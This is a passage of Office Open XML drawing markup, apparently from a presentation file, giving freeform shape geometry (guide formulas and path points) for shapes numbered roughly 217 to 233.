                  <a:gd name="T50" fmla="*/ 5 w 35"/>
                  <a:gd name="T51" fmla="*/ 5 h 44"/>
                  <a:gd name="T52" fmla="*/ 6 w 35"/>
                  <a:gd name="T53" fmla="*/ 4 h 44"/>
                  <a:gd name="T54" fmla="*/ 8 w 35"/>
                  <a:gd name="T55" fmla="*/ 3 h 44"/>
                  <a:gd name="T56" fmla="*/ 11 w 35"/>
                  <a:gd name="T57" fmla="*/ 4 h 44"/>
                  <a:gd name="T58" fmla="*/ 13 w 35"/>
                  <a:gd name="T59" fmla="*/ 1 h 44"/>
                  <a:gd name="T60" fmla="*/ 15 w 35"/>
                  <a:gd name="T61" fmla="*/ 0 h 44"/>
                  <a:gd name="T62" fmla="*/ 18 w 35"/>
                  <a:gd name="T63" fmla="*/ 3 h 44"/>
                  <a:gd name="T64" fmla="*/ 19 w 35"/>
                  <a:gd name="T65" fmla="*/ 0 h 44"/>
                  <a:gd name="T66" fmla="*/ 24 w 35"/>
                  <a:gd name="T67" fmla="*/ 0 h 44"/>
                  <a:gd name="T68" fmla="*/ 25 w 35"/>
                  <a:gd name="T69" fmla="*/ 5 h 44"/>
                  <a:gd name="T70" fmla="*/ 26 w 35"/>
                  <a:gd name="T71" fmla="*/ 7 h 44"/>
                  <a:gd name="T72" fmla="*/ 26 w 35"/>
                  <a:gd name="T73" fmla="*/ 11 h 44"/>
                  <a:gd name="T74" fmla="*/ 27 w 35"/>
                  <a:gd name="T75" fmla="*/ 16 h 44"/>
                  <a:gd name="T76" fmla="*/ 29 w 35"/>
                  <a:gd name="T77" fmla="*/ 14 h 44"/>
                  <a:gd name="T78" fmla="*/ 29 w 35"/>
                  <a:gd name="T79" fmla="*/ 11 h 44"/>
                  <a:gd name="T80" fmla="*/ 29 w 35"/>
                  <a:gd name="T81" fmla="*/ 8 h 44"/>
                  <a:gd name="T82" fmla="*/ 30 w 35"/>
                  <a:gd name="T83" fmla="*/ 7 h 44"/>
                  <a:gd name="T84" fmla="*/ 32 w 35"/>
                  <a:gd name="T85" fmla="*/ 6 h 44"/>
                  <a:gd name="T86" fmla="*/ 34 w 35"/>
                  <a:gd name="T87" fmla="*/ 6 h 44"/>
                  <a:gd name="T88" fmla="*/ 34 w 35"/>
                  <a:gd name="T89" fmla="*/ 8 h 44"/>
                  <a:gd name="T90" fmla="*/ 33 w 35"/>
                  <a:gd name="T91" fmla="*/ 9 h 44"/>
                  <a:gd name="T92" fmla="*/ 33 w 35"/>
                  <a:gd name="T93" fmla="*/ 13 h 44"/>
                  <a:gd name="T94" fmla="*/ 34 w 35"/>
                  <a:gd name="T95" fmla="*/ 16 h 4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5"/>
                  <a:gd name="T145" fmla="*/ 0 h 44"/>
                  <a:gd name="T146" fmla="*/ 35 w 35"/>
                  <a:gd name="T147" fmla="*/ 44 h 4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5" h="44">
                    <a:moveTo>
                      <a:pt x="34" y="16"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="32" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="25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20" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="43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5" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="31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6" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="4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26" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="16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29" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="7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3" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="16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399" name="Freeform 217">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F49D0B6A-1C77-4F6A-9BA9-22D0F3E8F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217"/>
                <a:ext cx="17" cy="17"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 14 w 17"/>
                  <a:gd name="T1" fmla="*/ 0 h 17"/>
                  <a:gd name="T2" fmla="*/ 13 w 17"/>
                  <a:gd name="T3" fmla="*/ 4 h 17"/>
                  <a:gd name="T4" fmla="*/ 12 w 17"/>
                  <a:gd name="T5" fmla="*/ 4 h 17"/>
                  <a:gd name="T6" fmla="*/ 14 w 17"/>
                  <a:gd name="T7" fmla="*/ 11 h 17"/>
                  <a:gd name="T8" fmla="*/ 12 w 17"/>
                  <a:gd name="T9" fmla="*/ 12 h 17"/>
                  <a:gd name="T10" fmla="*/ 10 w 17"/>
                  <a:gd name="T11" fmla="*/ 12 h 17"/>
                  <a:gd name="T12" fmla="*/ 10 w 17"/>
                  <a:gd name="T13" fmla="*/ 9 h 17"/>
                  <a:gd name="T14" fmla="*/ 9 w 17"/>
                  <a:gd name="T15" fmla="*/ 6 h 17"/>
                  <a:gd name="T16" fmla="*/ 9 w 17"/>
                  <a:gd name="T17" fmla="*/ 4 h 17"/>
                  <a:gd name="T18" fmla="*/ 9 w 17"/>
                  <a:gd name="T19" fmla="*/ 0 h 17"/>
                  <a:gd name="T20" fmla="*/ 9 w 17"/>
                  <a:gd name="T21" fmla="*/ 1 h 17"/>
                  <a:gd name="T22" fmla="*/ 8 w 17"/>
                  <a:gd name="T23" fmla="*/ 4 h 17"/>
                  <a:gd name="T24" fmla="*/ 8 w 17"/>
                  <a:gd name="T25" fmla="*/ 5 h 17"/>
                  <a:gd name="T26" fmla="*/ 8 w 17"/>
                  <a:gd name="T27" fmla="*/ 8 h 17"/>
                  <a:gd name="T28" fmla="*/ 9 w 17"/>
                  <a:gd name="T29" fmla="*/ 9 h 17"/>
                  <a:gd name="T30" fmla="*/ 10 w 17"/>
                  <a:gd name="T31" fmla="*/ 12 h 17"/>
                  <a:gd name="T32" fmla="*/ 9 w 17"/>
                  <a:gd name="T33" fmla="*/ 13 h 17"/>
                  <a:gd name="T34" fmla="*/ 5 w 17"/>
                  <a:gd name="T35" fmla="*/ 13 h 17"/>
                  <a:gd name="T36" fmla="*/ 4 w 17"/>
                  <a:gd name="T37" fmla="*/ 12 h 17"/>
                  <a:gd name="T38" fmla="*/ 3 w 17"/>
                  <a:gd name="T39" fmla="*/ 9 h 17"/>
                  <a:gd name="T40" fmla="*/ 3 w 17"/>
                  <a:gd name="T41" fmla="*/ 8 h 17"/>
                  <a:gd name="T42" fmla="*/ 3 w 17"/>
                  <a:gd name="T43" fmla="*/ 4 h 17"/>
                  <a:gd name="T44" fmla="*/ 2 w 17"/>
                  <a:gd name="T45" fmla="*/ 8 h 17"/>
                  <a:gd name="T46" fmla="*/ 2 w 17"/>
                  <a:gd name="T47" fmla="*/ 9 h 17"/>
                  <a:gd name="T48" fmla="*/ 4 w 17"/>
                  <a:gd name="T49" fmla="*/ 12 h 17"/>
                  <a:gd name="T50" fmla="*/ 4 w 17"/>
                  <a:gd name="T51" fmla="*/ 14 h 17"/>
                  <a:gd name="T52" fmla="*/ 3 w 17"/>
                  <a:gd name="T53" fmla="*/ 16 h 17"/>
                  <a:gd name="T54" fmla="*/ 2 w 17"/>
                  <a:gd name="T55" fmla="*/ 14 h 17"/>
                  <a:gd name="T56" fmla="*/ 0 w 17"/>
                  <a:gd name="T57" fmla="*/ 12 h 17"/>
                  <a:gd name="T58" fmla="*/ 1 w 17"/>
                  <a:gd name="T59" fmla="*/ 14 h 17"/>
                  <a:gd name="T60" fmla="*/ 2 w 17"/>
                  <a:gd name="T61" fmla="*/ 16 h 17"/>
                  <a:gd name="T62" fmla="*/ 4 w 17"/>
                  <a:gd name="T63" fmla="*/ 16 h 17"/>
                  <a:gd name="T64" fmla="*/ 4 w 17"/>
                  <a:gd name="T65" fmla="*/ 14 h 17"/>
                  <a:gd name="T66" fmla="*/ 4 w 17"/>
                  <a:gd name="T67" fmla="*/ 12 h 17"/>
                  <a:gd name="T68" fmla="*/ 5 w 17"/>
                  <a:gd name="T69" fmla="*/ 14 h 17"/>
                  <a:gd name="T70" fmla="*/ 8 w 17"/>
                  <a:gd name="T71" fmla="*/ 14 h 17"/>
                  <a:gd name="T72" fmla="*/ 10 w 17"/>
                  <a:gd name="T73" fmla="*/ 14 h 17"/>
                  <a:gd name="T74" fmla="*/ 10 w 17"/>
                  <a:gd name="T75" fmla="*/ 12 h 17"/>
                  <a:gd name="T76" fmla="*/ 11 w 17"/>
                  <a:gd name="T77" fmla="*/ 12 h 17"/>
                  <a:gd name="T78" fmla="*/ 12 w 17"/>
                  <a:gd name="T79" fmla="*/ 12 h 17"/>
                  <a:gd name="T80" fmla="*/ 14 w 17"/>
                  <a:gd name="T81" fmla="*/ 12 h 17"/>
                  <a:gd name="T82" fmla="*/ 14 w 17"/>
                  <a:gd name="T83" fmla="*/ 10 h 17"/>
                  <a:gd name="T84" fmla="*/ 12 w 17"/>
                  <a:gd name="T85" fmla="*/ 5 h 17"/>
                  <a:gd name="T86" fmla="*/ 14 w 17"/>
                  <a:gd name="T87" fmla="*/ 3 h 17"/>
                  <a:gd name="T88" fmla="*/ 16 w 17"/>
                  <a:gd name="T89" fmla="*/ 0 h 17"/>
                  <a:gd name="T90" fmla="*/ 14 w 17"/>
                  <a:gd name="T91" fmla="*/ 0 h 1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"/>
                  <a:gd name="T139" fmla="*/ 0 h 17"/>
                  <a:gd name="T140" fmla="*/ 17 w 17"/>
                  <a:gd name="T141" fmla="*/ 17 h 1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" h="17">
                    <a:moveTo>
                      <a:pt x="14" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="13" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="11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9" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="13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4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3" y="16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5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="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0" name="Freeform 218">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5D856C0-05C2-47E2-AC67-205CCE3E0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25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6 h 1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7"/>
                  <a:gd name="T11" fmla="*/ 1 w 1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1" name="Freeform 219">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B24D1FDC-B7CB-4EC2-9D95-DDB620F7C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" y="2225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8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8 w 17"/>
                  <a:gd name="T9" fmla="*/ 8 h 17"/>
                  <a:gd name="T10" fmla="*/ 8 w 17"/>
                  <a:gd name="T11" fmla="*/ 0 h 17"/>
                  <a:gd name="T12" fmla="*/ 0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2" name="Freeform 220">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B70AF90-FA35-4EAD-B740-16D7FEAFE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2227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6 h 17"/>
                  <a:gd name="T6" fmla="*/ 0 w 1"/>
                  <a:gd name="T7" fmla="*/ 0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3" name="Freeform 221">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4619EDF4-D4D0-48FC-B98E-F7120BD69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3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4 h 17"/>
                  <a:gd name="T4" fmla="*/ 0 w 17"/>
                  <a:gd name="T5" fmla="*/ 8 h 17"/>
                  <a:gd name="T6" fmla="*/ 0 w 17"/>
                  <a:gd name="T7" fmla="*/ 16 h 17"/>
                  <a:gd name="T8" fmla="*/ 0 w 17"/>
                  <a:gd name="T9" fmla="*/ 10 h 17"/>
                  <a:gd name="T10" fmla="*/ 0 w 17"/>
                  <a:gd name="T11" fmla="*/ 6 h 17"/>
                  <a:gd name="T12" fmla="*/ 0 w 17"/>
                  <a:gd name="T13" fmla="*/ 4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4" name="Freeform 222">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC7A541C-665B-4863-96D6-9D220784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" y="2229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9 w 17"/>
                  <a:gd name="T3" fmla="*/ 0 h 1"/>
                  <a:gd name="T4" fmla="*/ 0 w 17"/>
                  <a:gd name="T5" fmla="*/ 0 h 1"/>
                  <a:gd name="T6" fmla="*/ 5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5" name="Freeform 223">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D50C6CF5-5CCF-44FB-B982-FAD042495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" y="224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4 w 17"/>
                  <a:gd name="T3" fmla="*/ 8 h 17"/>
                  <a:gd name="T4" fmla="*/ 16 w 17"/>
                  <a:gd name="T5" fmla="*/ 16 h 17"/>
                  <a:gd name="T6" fmla="*/ 4 w 17"/>
                  <a:gd name="T7" fmla="*/ 8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4" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4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6" name="Freeform 224">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFC96850-D562-4245-8E02-CE14933A1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" y="2239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4 h 17"/>
                  <a:gd name="T4" fmla="*/ 5 w 17"/>
                  <a:gd name="T5" fmla="*/ 10 h 17"/>
                  <a:gd name="T6" fmla="*/ 0 w 17"/>
                  <a:gd name="T7" fmla="*/ 16 h 17"/>
                  <a:gd name="T8" fmla="*/ 9 w 17"/>
                  <a:gd name="T9" fmla="*/ 16 h 17"/>
                  <a:gd name="T10" fmla="*/ 16 w 17"/>
                  <a:gd name="T11" fmla="*/ 10 h 17"/>
                  <a:gd name="T12" fmla="*/ 16 w 17"/>
                  <a:gd name="T13" fmla="*/ 4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6" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="10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16" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16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7" name="Freeform 225">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0440A9B-FD08-4B18-9E51-FD8D55A8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" y="2211"/>
                <a:ext cx="27" cy="20"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 5 w 27"/>
                  <a:gd name="T1" fmla="*/ 19 h 20"/>
                  <a:gd name="T2" fmla="*/ 0 w 27"/>
                  <a:gd name="T3" fmla="*/ 9 h 20"/>
                  <a:gd name="T4" fmla="*/ 8 w 27"/>
                  <a:gd name="T5" fmla="*/ 4 h 20"/>
                  <a:gd name="T6" fmla="*/ 21 w 27"/>
                  <a:gd name="T7" fmla="*/ 0 h 20"/>
                  <a:gd name="T8" fmla="*/ 26 w 27"/>
                  <a:gd name="T9" fmla="*/ 10 h 20"/>
                  <a:gd name="T10" fmla="*/ 13 w 27"/>
                  <a:gd name="T11" fmla="*/ 14 h 20"/>
                  <a:gd name="T12" fmla="*/ 5 w 27"/>
                  <a:gd name="T13" fmla="*/ 19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20"/>
                  <a:gd name="T23" fmla="*/ 27 w 27"/>
                  <a:gd name="T24" fmla="*/ 20 h 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20">
                    <a:moveTo>
                      <a:pt x="5" y="19"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="19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08" name="Oval 226">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D12B8455-8025-4641-B9D7-493038F40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7" y="2228"/>
                <a:ext cx="8" cy="8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Freeform 227">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFDE9440-2318-409B-8751-FB9E55319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" y="222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3 w 17"/>
                  <a:gd name="T3" fmla="*/ 8 h 17"/>
                  <a:gd name="T4" fmla="*/ 16 w 17"/>
                  <a:gd name="T5" fmla="*/ 5 h 17"/>
                  <a:gd name="T6" fmla="*/ 16 w 17"/>
                  <a:gd name="T7" fmla="*/ 3 h 17"/>
                  <a:gd name="T8" fmla="*/ 16 w 17"/>
                  <a:gd name="T9" fmla="*/ 1 h 17"/>
                  <a:gd name="T10" fmla="*/ 16 w 17"/>
                  <a:gd name="T11" fmla="*/ 0 h 17"/>
                  <a:gd name="T12" fmla="*/ 13 w 17"/>
                  <a:gd name="T13" fmla="*/ 0 h 17"/>
                  <a:gd name="T14" fmla="*/ 8 w 17"/>
                  <a:gd name="T15" fmla="*/ 0 h 17"/>
                  <a:gd name="T16" fmla="*/ 6 w 17"/>
                  <a:gd name="T17" fmla="*/ 1 h 17"/>
                  <a:gd name="T18" fmla="*/ 4 w 17"/>
                  <a:gd name="T19" fmla="*/ 3 h 17"/>
                  <a:gd name="T20" fmla="*/ 4 w 17"/>
                  <a:gd name="T21" fmla="*/ 5 h 17"/>
                  <a:gd name="T22" fmla="*/ 3 w 17"/>
                  <a:gd name="T23" fmla="*/ 8 h 17"/>
                  <a:gd name="T24" fmla="*/ 0 w 17"/>
                  <a:gd name="T25" fmla="*/ 10 h 17"/>
                  <a:gd name="T26" fmla="*/ 8 w 17"/>
                  <a:gd name="T27" fmla="*/ 16 h 17"/>
                  <a:gd name="T28" fmla="*/ 13 w 17"/>
                  <a:gd name="T29" fmla="*/ 14 h 17"/>
                  <a:gd name="T30" fmla="*/ 16 w 17"/>
                  <a:gd name="T31" fmla="*/ 9 h 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"/>
                  <a:gd name="T49" fmla="*/ 0 h 17"/>
                  <a:gd name="T50" fmla="*/ 17 w 17"/>
                  <a:gd name="T51" fmla="*/ 17 h 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" h="17">
                    <a:moveTo>
                      <a:pt x="16" y="9"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="13" y="8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8" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="14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0" name="Freeform 228">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA296D49-8849-4B96-AD9B-E71891418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" y="2230"/>
                <a:ext cx="17" cy="1"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 8 w 17"/>
                  <a:gd name="T1" fmla="*/ 0 h 1"/>
                  <a:gd name="T2" fmla="*/ 0 w 17"/>
                  <a:gd name="T3" fmla="*/ 0 h 1"/>
                  <a:gd name="T4" fmla="*/ 16 w 17"/>
                  <a:gd name="T5" fmla="*/ 0 h 1"/>
                  <a:gd name="T6" fmla="*/ 8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8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1" name="Freeform 229">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB9A6790-B6A5-4E1C-AE24-CCEDB5887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" y="2213"/>
                <a:ext cx="17" cy="17"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 16 w 17"/>
                  <a:gd name="T1" fmla="*/ 3 h 17"/>
                  <a:gd name="T2" fmla="*/ 16 w 17"/>
                  <a:gd name="T3" fmla="*/ 6 h 17"/>
                  <a:gd name="T4" fmla="*/ 13 w 17"/>
                  <a:gd name="T5" fmla="*/ 8 h 17"/>
                  <a:gd name="T6" fmla="*/ 13 w 17"/>
                  <a:gd name="T7" fmla="*/ 10 h 17"/>
                  <a:gd name="T8" fmla="*/ 16 w 17"/>
                  <a:gd name="T9" fmla="*/ 12 h 17"/>
                  <a:gd name="T10" fmla="*/ 13 w 17"/>
                  <a:gd name="T11" fmla="*/ 13 h 17"/>
                  <a:gd name="T12" fmla="*/ 11 w 17"/>
                  <a:gd name="T13" fmla="*/ 14 h 17"/>
                  <a:gd name="T14" fmla="*/ 9 w 17"/>
                  <a:gd name="T15" fmla="*/ 16 h 17"/>
                  <a:gd name="T16" fmla="*/ 6 w 17"/>
                  <a:gd name="T17" fmla="*/ 16 h 17"/>
                  <a:gd name="T18" fmla="*/ 2 w 17"/>
                  <a:gd name="T19" fmla="*/ 14 h 17"/>
                  <a:gd name="T20" fmla="*/ 0 w 17"/>
                  <a:gd name="T21" fmla="*/ 13 h 17"/>
                  <a:gd name="T22" fmla="*/ 0 w 17"/>
                  <a:gd name="T23" fmla="*/ 12 h 17"/>
                  <a:gd name="T24" fmla="*/ 0 w 17"/>
                  <a:gd name="T25" fmla="*/ 9 h 17"/>
                  <a:gd name="T26" fmla="*/ 0 w 17"/>
                  <a:gd name="T27" fmla="*/ 8 h 17"/>
                  <a:gd name="T28" fmla="*/ 0 w 17"/>
                  <a:gd name="T29" fmla="*/ 4 h 17"/>
                  <a:gd name="T30" fmla="*/ 2 w 17"/>
                  <a:gd name="T31" fmla="*/ 3 h 17"/>
                  <a:gd name="T32" fmla="*/ 4 w 17"/>
                  <a:gd name="T33" fmla="*/ 0 h 17"/>
                  <a:gd name="T34" fmla="*/ 13 w 17"/>
                  <a:gd name="T35" fmla="*/ 0 h 17"/>
                  <a:gd name="T36" fmla="*/ 16 w 17"/>
                  <a:gd name="T37" fmla="*/ 3 h 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17"/>
                  <a:gd name="T59" fmla="*/ 17 w 17"/>
                  <a:gd name="T60" fmla="*/ 17 h 1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17">
                    <a:moveTo>
                      <a:pt x="16" y="3"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="16" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9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13" y="0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2" name="Freeform 230">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16C8C316-FC7C-40E3-B113-4D2DA1793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220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7"/>
                  <a:gd name="T11" fmla="*/ 1 w 1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3" name="Freeform 231">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67BC6E5E-6ED8-49C1-ACA1-20C920B6A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9" y="2504"/>
                <a:ext cx="94" cy="43"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 55 w 94"/>
                  <a:gd name="T1" fmla="*/ 1 h 43"/>
                  <a:gd name="T2" fmla="*/ 56 w 94"/>
                  <a:gd name="T3" fmla="*/ 12 h 43"/>
                  <a:gd name="T4" fmla="*/ 31 w 94"/>
                  <a:gd name="T5" fmla="*/ 22 h 43"/>
                  <a:gd name="T6" fmla="*/ 10 w 94"/>
                  <a:gd name="T7" fmla="*/ 27 h 43"/>
                  <a:gd name="T8" fmla="*/ 0 w 94"/>
                  <a:gd name="T9" fmla="*/ 30 h 43"/>
                  <a:gd name="T10" fmla="*/ 0 w 94"/>
                  <a:gd name="T11" fmla="*/ 37 h 43"/>
                  <a:gd name="T12" fmla="*/ 15 w 94"/>
                  <a:gd name="T13" fmla="*/ 40 h 43"/>
                  <a:gd name="T14" fmla="*/ 37 w 94"/>
                  <a:gd name="T15" fmla="*/ 42 h 43"/>
                  <a:gd name="T16" fmla="*/ 56 w 94"/>
                  <a:gd name="T17" fmla="*/ 38 h 43"/>
                  <a:gd name="T18" fmla="*/ 67 w 94"/>
                  <a:gd name="T19" fmla="*/ 36 h 43"/>
                  <a:gd name="T20" fmla="*/ 68 w 94"/>
                  <a:gd name="T21" fmla="*/ 39 h 43"/>
                  <a:gd name="T22" fmla="*/ 82 w 94"/>
                  <a:gd name="T23" fmla="*/ 38 h 43"/>
                  <a:gd name="T24" fmla="*/ 92 w 94"/>
                  <a:gd name="T25" fmla="*/ 38 h 43"/>
                  <a:gd name="T26" fmla="*/ 92 w 94"/>
                  <a:gd name="T27" fmla="*/ 32 h 43"/>
                  <a:gd name="T28" fmla="*/ 93 w 94"/>
                  <a:gd name="T29" fmla="*/ 28 h 43"/>
                  <a:gd name="T30" fmla="*/ 93 w 94"/>
                  <a:gd name="T31" fmla="*/ 20 h 43"/>
                  <a:gd name="T32" fmla="*/ 90 w 94"/>
                  <a:gd name="T33" fmla="*/ 16 h 43"/>
                  <a:gd name="T34" fmla="*/ 86 w 94"/>
                  <a:gd name="T35" fmla="*/ 11 h 43"/>
                  <a:gd name="T36" fmla="*/ 85 w 94"/>
                  <a:gd name="T37" fmla="*/ 0 h 43"/>
                  <a:gd name="T38" fmla="*/ 55 w 94"/>
                  <a:gd name="T39" fmla="*/ 1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4"/>
                  <a:gd name="T61" fmla="*/ 0 h 43"/>
                  <a:gd name="T62" fmla="*/ 94 w 94"/>
                  <a:gd name="T63" fmla="*/ 43 h 4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4" h="43">
                    <a:moveTo>
                      <a:pt x="55" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="56" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="27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15" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85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4" name="Freeform 232">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F9BDB90-77AF-4404-8B78-5E8FA6084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" y="2520"/>
                <a:ext cx="26" cy="17"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 19 w 26"/>
                  <a:gd name="T1" fmla="*/ 0 h 17"/>
                  <a:gd name="T2" fmla="*/ 25 w 26"/>
                  <a:gd name="T3" fmla="*/ 8 h 17"/>
                  <a:gd name="T4" fmla="*/ 2 w 26"/>
                  <a:gd name="T5" fmla="*/ 16 h 17"/>
                  <a:gd name="T6" fmla="*/ 0 w 26"/>
                  <a:gd name="T7" fmla="*/ 10 h 17"/>
                  <a:gd name="T8" fmla="*/ 19 w 26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7"/>
                  <a:gd name="T17" fmla="*/ 26 w 2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7">
                    <a:moveTo>
                      <a:pt x="19" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="25" y="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19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5" name="Freeform 233">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DD7EC8B-43E3-4223-BE50-460A1573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2530"/>
                <a:ext cx="28" cy="17"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 23 w 28"/>
                  <a:gd name="T1" fmla="*/ 0 h 17"/>
